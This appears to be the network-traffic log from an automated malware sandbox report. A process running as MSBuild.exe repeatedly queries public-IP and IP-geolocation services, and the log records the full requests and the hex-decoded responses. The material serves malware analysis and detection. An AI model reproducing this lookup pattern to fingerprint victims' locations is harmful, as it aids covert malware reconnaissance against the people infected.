                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 7, 2024 12:49:07.994718075 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 7, 2024 12:49:08.644323111 CET323INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:08 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 106
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: e753f3b8a8ac2fc68eb8121ec2c1f962
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
                                                                                                              Nov 7, 2024 12:49:08.648875952 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Nov 7, 2024 12:49:08.797954082 CET323INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:08 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 106
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 9458aebc856938d6f0cfeb0b612ca001
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
                                                                                                              Nov 7, 2024 12:49:10.022247076 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Nov 7, 2024 12:49:10.184925079 CET323INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:10 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 106
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 5a684743ac1216acbd0f53845c22fe6e
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.1249717158.101.44.242801016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 7, 2024 12:49:10.976272106 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Nov 7, 2024 12:49:11.606470108 CET323INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:11 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 106
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: e63e2839eaa3b0dd8c2cfcde6d1f1624
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.1249720158.101.44.242801016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 7, 2024 12:49:12.355129004 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 7, 2024 12:49:13.009958029 CET323INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:12 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 106
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 502178a71e96a49f32240103383d8952
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.1249723158.101.44.242801016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 7, 2024 12:49:13.773189068 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 7, 2024 12:49:14.423204899 CET323INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:14 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 106
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: e24e939d513825c5455bbde419cb98ae
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.1249725158.101.44.242801016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 7, 2024 12:49:15.197859049 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 7, 2024 12:49:15.875992060 CET323INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:15 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 106
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: e80c05e5acd92e1e67d9b983cb4b54a6
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.1249727158.101.44.242801016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 7, 2024 12:49:17.052427053 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 7, 2024 12:49:17.709129095 CET323INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:17 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 106
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 5cf174e8852c358234b31774edddbcd1
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.1249729158.101.44.242801016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 7, 2024 12:49:18.481693983 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 7, 2024 12:49:19.117049932 CET323INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:19 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 106
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 53248497a6ff0db8c80f34f8b77b59b2
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.1249731158.101.44.242801016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 7, 2024 12:49:19.874064922 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 7, 2024 12:49:20.514695883 CET323INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:20 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 106
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 956f096ed4c394cd5ff64d65957d8b4f
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.1249714188.114.96.34431016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-07 11:49:09 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-11-07 11:49:09 UTC1215INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:09 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 359
                                                                                                              Connection: close
                                                                                                              x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                              x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                              x-cache: Miss from cloudfront
                                                                                                              via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                              x-amz-cf-pop: DFW57-P5
                                                                                                              x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              CF-Cache-Status: HIT
                                                                                                              Age: 23327
                                                                                                              Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JC93UbYrRHHtK5lVmt4qE2uL2ixvrbHrGDDzkGL24Rx6E5KSHHFGDVVApx6xIzw4wO14bU1qENSszAsrZz%2BHqi7b2%2BSGu3hiXAjE6bJyjUClkiJslXGa6dUU1EoRhaqySQHFTy7a"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ded19301d9fe76a-DFW
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2691449&cwnd=242&unsent_bytes=0&cid=7bcb5e7f1991828a&ts=346&x=0"
                                                                                                              2024-11-07 11:49:09 UTC154INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78
                                                                                                              Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
                                                                                                              2024-11-07 11:49:09 UTC205INData Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                              Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.1249716188.114.96.34431016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-07 11:49:10 UTC63OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2024-11-07 11:49:10 UTC1221INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:10 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 359
                                                                                                              Connection: close
                                                                                                              x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                              x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                              x-cache: Miss from cloudfront
                                                                                                              via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                              x-amz-cf-pop: DFW57-P5
                                                                                                              x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              CF-Cache-Status: HIT
                                                                                                              Age: 23328
                                                                                                              Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RgOUZgMdEn2BOrFi5Do5t3%2F0EoSUN4OhNxHKCf7WyMLA5Bq2V0u69pYmhK3COCqAt6cCtpCQawyOm%2FLizynsE9iMPck93Y7s6lToaW7mbYQZmLNEWH8%2F3eS1%2BRu9aGz%2FLPr2NpaU"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ded19370dac478b-DFW
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1181&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2335483&cwnd=251&unsent_bytes=0&cid=a89cd2ac44498350&ts=153&x=0"
                                                                                                              2024-11-07 11:49:10 UTC148INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
                                                                                                              Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                                                                                              2024-11-07 11:49:10 UTC211INData Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                              Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.1249719188.114.96.34431016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-07 11:49:12 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-11-07 11:49:12 UTC1223INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:12 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 359
                                                                                                              Connection: close
                                                                                                              x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                              x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                              x-cache: Miss from cloudfront
                                                                                                              via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                              x-amz-cf-pop: DFW57-P5
                                                                                                              x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              CF-Cache-Status: HIT
                                                                                                              Age: 23330
                                                                                                              Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vY2JE1vm4IuB%2BSwXGJj%2BDUh6SsdjcNvKetOYZzcF3wOnKzDX0ZiDwwO%2FHcUYJt1aNh2QgDrc9ITDZpQW4i8tqdAv4LwsxC7OUEYAQxJNv0zM92F4KtBWf%2BJbO%2FB0KWJ%2FPEBq2Fgy"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ded193fa9c046a1-DFW
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1923&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1505980&cwnd=251&unsent_bytes=0&cid=31d1862ef0a69773&ts=143&x=0"
                                                                                                              2024-11-07 11:49:12 UTC146INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e
                                                                                                              Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
                                                                                                              2024-11-07 11:49:12 UTC213INData Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                              Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.1249722188.114.96.34431016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-07 11:49:13 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-11-07 11:49:13 UTC1223INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:13 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 359
                                                                                                              Connection: close
                                                                                                              x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                              x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                              x-cache: Miss from cloudfront
